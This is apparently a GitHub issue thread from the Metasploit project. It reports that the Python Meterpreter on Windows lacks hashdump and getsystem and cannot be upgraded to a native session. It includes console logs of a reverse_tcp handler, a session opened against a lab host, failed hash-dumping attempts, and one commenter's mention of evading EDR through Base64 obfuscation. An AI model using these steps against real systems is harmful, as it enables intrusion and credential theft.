Open FilterUnfiltered opened 6 years ago
For what platform? Linux? Did you try post/linux/gather/hashdump
?
windows, and it's not compatible
Did you try any of the Windows post modules for dumping hashes?
yes, not compatible. I get the following:
meterpreter > run post/windows/gather/hashdump
[!] SESSION may not be compatible with this module.
[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method unpack' for nil:NilClass [-] Call stack: [-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:41:in
run'
That looks like a bug.
That happens with basically everything that isn't in the python meterpreter help options... That or similar things, like the module freezing or just crashing the meterpreter shell entirely.
Yeah, I think it's sufficient to say post modules haven't been tested with every type of Meterpreter.
Well, maybe try upgrading to a native Meterpreter for the time being. sessions -u
or post/multi/manage/shell_to_meterpreter
.
it's not a shell it's a python meterpreter post/multi/manage/shell_to_meterpreter doesn't work and neither does sessions -u... ;(
I thought we fixed that so Meterpreters could upgrade themselves.
@wvu-r7 we did, but it doesn't support all meterpreters. IIRC, upgrading a lame meterpreter to a real meterpreter has the same issue as sessions -u
, largely due to failure to auto-detect the appropriate arch
/ platform
. There are some other bugs with sessions -u
, see: #9511
I can confirm that python meterpreter on Windows does not support hashdump
and getsystem
. Likewise, sessions -u
will not upgrade to a native meterpreter.
msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.191.188:1337
[*] Sending stage (53508 bytes) to 172.16.191.153
[*] Meterpreter session 611 opened (172.16.191.188:1337 -> 172.16.191.153:49372) at 2018-06-29 00:12:30 -0400
^C[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 611
[*] Starting interaction with 611...
meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter > getsystem
[-] Unknown command: getsystem.
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > sysinfo
Computer : WIN-SGBSD5TQUTQ
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : en_US
Meterpreter : python/windows
meterpreter >
Background session 611? [y/N]
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -u 611
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [611]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 611
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.191.188:4433
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Windows error: The system cannot find the file specified.
[-] Call stack:
[-] /pentest/exploit/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
[-] /pentest/exploit/metasploit-framework/lib/msf/core/post/common.rb:89:in `cmd_exec'
[-] /pentest/exploit/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:164:in `run'
msf5 exploit(multi/handler) >
Works as expected with a real meterpreter (windows/x64/meterpreter/reverse_tcp
).
:'(
I've been quite successful evading EPP and EDR detections with Base64 obfuscation on py scripts, but I have the exact same issue like it's been described here where upgrade to native meterpreter it's not working. You guys aware of any progress?
Please add the hashdump command to the python meterpreter, thanks!